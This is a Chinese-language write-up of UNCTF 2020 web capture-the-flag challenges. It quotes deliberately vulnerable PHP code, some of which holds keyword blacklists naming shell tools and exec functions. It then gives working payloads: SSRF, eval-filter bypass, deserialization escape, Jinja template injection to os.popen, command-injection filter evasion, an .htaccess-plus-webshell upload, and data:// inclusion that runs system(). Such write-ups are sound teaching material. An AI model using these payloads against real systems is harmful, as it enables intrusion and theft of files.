时间:2020年11月7日-11月14日
题目来源:UNCTF
easy_ssrf
<?php
echo'<center><strong>welc0me to 2020UNCTF!!</strong></center>';
highlight_file(__FILE__);
$url = $_GET['url'];
if(preg_match('/unctf\.com/',$url)){
if(!preg_match('/php|file|zip|bzip|zlib|base|data/i',$url)){
$url=file_get_contents($url);
echo($url);
} else {
echo('error!!');
}
}else{
echo("error");
}
?>payload:
?url=unctf.com%../../../../../flag提示:url的语法,例如%#符号的使用等
babyeval
// flag在flag.php
if(isset($_GET['a'])){
if(preg_match('/\(.*\)/', $_GET['a']))
die('hacker!!!');
ob_start(function($data){
if (strpos($data, 'flag') !== false)
return 'ByeBye hacker';
return false;
});
eval($_GET['a']);
} else {
highlight_file(__FILE__);
}
?> payload:
?a=echo `cat flag.php | base64`payload2:
?a=include 'php://filter/read/convert.base64-encode/resource=./flag.php'easyunserialize
<?php
error_reporting(0);
highlight_file(__FILE__);
class a
{
public $uname;
public $password;
public function __construct($uname,$password)
{
$this->uname=$uname;
$this->password=$password;
}
public function __wakeup()
{
if($this->password==='easy')
{
include('flag.php');
echo $flag;
}
else
{
echo 'wrong password';
}
}
}
function filter($string){
return str_replace('challenge','easychallenge',$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>payload:
?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}111提示:反序列化字符串的逃逸
ezphp
<?php
show_source(__FILE__);
$username = "admin";
$password = "password";
include("flag.php");
$data = isset($_POST['data'])? $_POST['data']: "" ;
$data_unserialize = unserialize($data);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
echo $flag;
}else{
echo "username or password error!";
}payload:
POST:data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}提示:php弱类型比较
easyflask
题目走起来有登陆与注册,直接注册admin/admin,然后回到首页会回显secret_route_you_do_not_know页面
进入页面叫你猜测?guess=
发现这里存在SSTI漏洞(之前还爆破了很久SECRIT_KEY)
这里的SSTI过滤了:
[ ] ' " _这里过滤的下划线可以用|attr(request.args.cla)来绕过
过滤的单双引号用request.args.a来绕过,并传递GET参数
过滤的大括号[]可以用.pop(1)或者__getitem__来绕过,一定注意python中访问这些子类,还有属性,还有字典的键值的方式,不然很容易出错!!(我就是在这里搞了半天)
这里利用的链:
().__class__.__bases__.__subclasses__.[166](warnings.catch_warnings).__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat%20flag.txt').read()")payload:
{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))|attr(request.args.sub)()).pop(166)|attr(request.args.ini)|attr(request.args.glo)|attr(request.args.geti)(request.args.bui)|attr(request.args.geti)(request.args.ii)(request.args.hh)}}&cla=__class__&bas=__bases__&sub=__subclasses__&ini=__init__&glo=__globals__&bui=__builtins__&hh=__import__('os').popen('cat flag.txt').read()&ii=eval&geti=__getitem__放几篇文章:(实际上我翻了N篇)
https://www.mi1k7ea.com/2019/05/31/Python沙箱逃逸小结/
https://www.secpulse.com/archives/115367.html
UN’s_online_tools
打开是一个老online-tool了,功能是ping给定的ip
首先的思路一定是fuzz一下看看ban了哪些符号,bp测试了一下,ban掉了以下符号:
$
&
*
{
]
;
'
>
空格接下来用管道符号ls一下:|ls,发现可以回显index.php
然后绕过一下空格,这里用的是%09,过滤了cat用反斜杠绕一下
看一下源码:|ca\t%09index.php
<!doctype html>
<html>
<head>
<meta charset='utf-8'>
<title>Login</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="box">
<h2>PING</h2>
<h4>其他功能待开发</h4>
<form action="./index.php" method="get">
<div class="inputBox">
<input type="text" name="url" required="">
<label>Url</label>
</div>
<input type="submit" name="GO" value="GO">
</form>
<br>
<?php
if (isset($_GET['url'])){
$ip=$_GET['url'];
if(preg_match("/(;|'| |>|]|&| |\\$|\\|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)/i", $ip)){
die("<strong><center>非法字符</center></strong>");
}
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("<strong><center>非法字符</center></strong>");
}
$a = shell_exec("ping -c 4 ".$ip);
echo($a);
}else{
echo "<script>alert('欢迎来到UN`s online tools 如果师傅觉得题目不适合您,可以出门左拐')</script>";
}
?>
</div>
</body>
</html>这一下过滤的东西就清楚了,过滤了flag可以用?来过滤
payload:
|ca\t%09/f???回显可以看到flag
easy_upload
文件上传,文件名字是过滤完了的,只能上传图片文件,但是上传之后文件名不会变,所以考虑htacess
上传.htaccess:
POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 378
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename=".htaccess"
Content-Type: image/jpeg
SetHandler application/x-httpd-p\
hp
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"
submit
-----------------------------3533994738563832533554341631--
这里过滤了文件内容:perl|pyth|ph|auto|curl|base|\|>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!
POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 359
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename="a.jpg"
Content-Type: image/jpeg
<?=system("cat /flag");
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"
submit
-----------------------------3533994738563832533554341631--访问a.jpg即可![toc]
ezfind
这题我也非预期了。。。。
是在做不出来的时候,我打开了bp,把所有fuzz的payload加上,结果出来了。。。人傻了
爆破出来的payload末尾有%00,所以简短的payload可以如下:
name=%00赛后复现,发现传入数组或者%00时,is_file函数会返回null
不愧是最好的语言!
L0vephp
比赛的时候没做出来,没找到入口,赛后star师傅提示,?action
首先文件包含绕过读取flag.php:
php://filter/read=convert.quoted-printable-encode/resource=flag.php进入1nD3x.php:
在flag.php里面发现一个虚假的flag,然后提示1nD3x.php
<?php
error_reporting(0);
show_source(__FILE__);
$code=$_REQUEST['code'];
$_=array('@','\~','\^','\&','\?','\<','\>','\*','\`','\+','\-','\'','\"','\\\\','\/');
$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');
$blacklist1 = array_merge($_);
$blacklist2 = array_merge($__);
if (strlen($code)>16){
die('Too long');
}
foreach ($blacklist1 as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/m', $code)) {
die('WTF???');
}
}
foreach ($blacklist2 as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('Sry,try again');
}
}
@eval($code);
?>可以看到过滤了很多符号还有命令执行函数,还有16个字符限制,这里可以用payload简单的看到phpinfo()页面:
?code=${phpinfo()};
可以看到一个很重要的信息:
allow_url_fopen On On
allow_url_include On On考虑一下文件包含执行命令,payload:
?code=include$_GET[1];&1=data://text/plain,<?php%20system("cat%20/flag_mdnrvvldb");?>这里flag改了名字,怪说不得找不到flag,先ls /一下就好了